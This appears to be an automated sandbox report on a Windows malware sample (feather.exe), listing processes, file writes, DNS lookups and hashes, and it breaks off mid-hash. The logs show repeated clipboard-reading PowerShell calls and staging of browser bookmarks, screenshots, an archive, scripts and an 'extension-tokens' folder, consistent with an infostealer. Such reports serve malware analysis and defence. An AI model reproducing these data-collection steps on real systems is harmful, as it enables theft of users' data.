C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\5d3f71723c5e464aa1a06259e50323c0 /t 1440 /p 1804

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\BackgroundTaskHost.exe

"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault52e6eeach2d99h4d8dh8d4fh8968a3b876e1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault38459c21h7750h4fc5hb430h1194dc23eeba

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\ShowFormat.jpg" /ForceBootstrapPaint3D

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Pictures\My Wallpaper.jpg" /ForceBootstrapPaint3D

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "

C:\Windows\system32\taskkill.exe

taskkill /f /im goosedesktop.exe

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\main.ps1"

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "

C:\Windows\system32\taskkill.exe

taskkill /f /im goosedesktop.exe

Network


Files

C:\Users\Admin\AppData\Local\Temp\830fab18-4e9a-4bb1-8a24-72554fabcfc0.tmp.node

C:\Users\Admin\AppData\Local\Temp\26816be1-193e-4d66-974e-60bdfd02bd0f.tmp.node

C:\Users\Admin\AppData\Local\Temp\60b9b61e-2157-4d49-952c-994d811a4cc1.tmp.node

memory/3232-26-0x0000022E06C70000-0x0000022E06C92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxqbckpn.dkv.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\Ky7j15TmYMCNH4X5PK72\System\NQPTTMRM - 2024-06-11_175318.png

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

C:\Users\Admin\AppData\Local\Temp\Ky7j15TmYMCNH4X5PK72\Browsers\Bookmarks.txt

C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseModdingAPI.dll

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\config.ini

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk1.mp3

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\MudSquith.mp3

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\Music\Music.mp3

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk3.mp3

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Images\Memes\icegif-511.gif

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk2.mp3

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\BITE.mp3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

120s

Max time network

129s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2192 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2192 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2192 -s 88

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 9.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 43.43.201.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\System.dll

\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\nsis7z.dll

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\chrome_100_percent.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\chrome_200_percent.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\d3dcompiler_47.dll

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\ffmpeg.dll

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\icudtl.dat

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\libGLESv2.dll

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\LICENSE.electron.txt

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\libEGL.dll

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\resources.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\LICENSES.chromium.html

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\snapshot_blob.bin

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\v8_context_snapshot.bin

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\vk_swiftshader_icd.json

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\vulkan-1.dll

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\vk_swiftshader.dll

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\af.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\bn.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\el.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\et.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\he.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ja.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\nl.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sk.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ru.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ro.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sl.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\pt-PT.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\pt-BR.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sr.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\tr.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\zh-TW.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\resources\elevate.exe

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\StdUtils.dll

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\zh-CN.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\vi.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ur.pak

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\uk.pak

MD5 381cb33c2d4fd0225c5c14447e6a84e0
SHA1 686b888228f6dd95ade94fee62eb1d75f3e0fc93
SHA256 c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820
SHA512 f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\th.pak

MD5 4917873d8118906bdc08f31afb1ea078
SHA1 49440a3b156d7703533367f8f13f66ec166db6e9
SHA256 d051b400096922089f6daa723fac18c9640ba203b2879aac4ca89b05738dd32d
SHA512 30e6446bad54b86be553fa293c7a92ec221adb54b99624ed69702df75347a98697158041a45f77ece4e7ed0fda41306ef21eb27981f24f0a4e42e8306175a88e

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\te.pak

MD5 17b858cf23a206b5822f8b839d7c1ea3
SHA1 115220668f153b36254951e9aa4ef0aa2be1ffc4
SHA256 d6180484b51aacbf59419e3a9b475a4419fb7d195aea7c3d58339f0f072c1457
SHA512 7b919a5b451ec2ba15d377e4a3a6f99d63268e9be2865d674505584eed4fa190eaae589c9592276b996b7ce2fdfae80fda20feff9ea9adbb586308dfd7f12c2a

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ta.pak

MD5 5f80c9da0c09491c70123581a41f6dad
SHA1 3fc9560a954271cf09aaa54eec34963c72c06e85
SHA256 30658d99d753946e9c9c02094c89be25b710db77251df6cd1a8839c29de5f884
SHA512 072c5db7fe1eb9e6c270d0e9b439cf84ebb3dc374d4f01f01f9341030883f2d6d9c6970fb6ef14bf96fccb51eade9ca762f396f89ba1d3df1230dda68557fd4a

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sw.pak

MD5 59ff4e16b640ef41100243857efdd009
SHA1 f712b2d39618ffadcf68d1f2ab5a76da5be14d74
SHA256 c18a209f8ec3641c90ea8ced5343f943f034e09c8e75466e24dcabc070d08804
SHA512 0e721a6cbf209ac35272ad292b2e5000d4e690062ddb498dbf6e8e6ee5f6e86d034a7303a46c2b85750245381c78efafc416ead13c1fe0ee5ec6088dd66adca2

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sv.pak

MD5 e4c9ced1a36ea7b71634e4df9618804f
SHA1 c966c8eb9763a9147854989ea443c6be0634db27
SHA256 e5cccdb241938f4a6b9af5a245abe0e0218c72e08a73db3ed0452c6ddfb9c379
SHA512 d07a4d62f22a1830d3ec44f0c347e4a7d70b35ceba126cbdc246a7b3ee7eda85e2338bab3edc7223f579964868136bb10d42c05e0e0ff9f73447b3606d9b2c4e

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\pl.pak

MD5 ba7a9aba68211d8639dffae0ef8b88da
SHA1 a9a26b8f0902475cb576967cbe9013028cb21da4
SHA256 60aa08598a81bb46ddc64a5ab0852565554c6e6262e9c5dfee09f4e3fc08d5fe
SHA512 a1b8bfc3e19aa1267e31838e1c1f2b0b1cfcdf56f84e967088d626b58ec64b3305043a14b12fd080498ee1d74a4192453914c393ce8f848ea5616cf88abc4eb5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\nb.pak

MD5 28cc86c7204b14d080f661a388e7f2c0
SHA1 e0927ea3c4fd6875dafd7946affb74ad2db400f5
SHA256 9253122d94ccea904fb9363b8178ca9335b8380b7891f1a7a22afb3113309e72
SHA512 e2524e10d145f95c028d65e47cf06fc82c7a43fcf0ecf01202278c7fb14079c03e9434e8039fd96aaee870872c9896d9f0ed575e50c19a3781cb0c94fe59b3a5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ms.pak

MD5 73096184d7bd6a9a2a27202d30a3cfa1
SHA1 ea711b29787aa8b9e9af6bde5b74103429e5855f
SHA256 d1072514bab63af5dfbf923175d491787139f0c1b6361acb23e67543836c84ba
SHA512 e3fbee4896554e502c222b5ffe38e9d61e9db4d18cdc92ce5118b819dc60789bfd6d6c7f8444ff1763222455ab91e79bfe500e75c0e06b0de70c2c64fb043c6f

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\mr.pak

MD5 fda40999c6a1b435a1490f5edca57ccd
SHA1 41103b2182281df2e7c04a3fff23ec6a416d6aa9
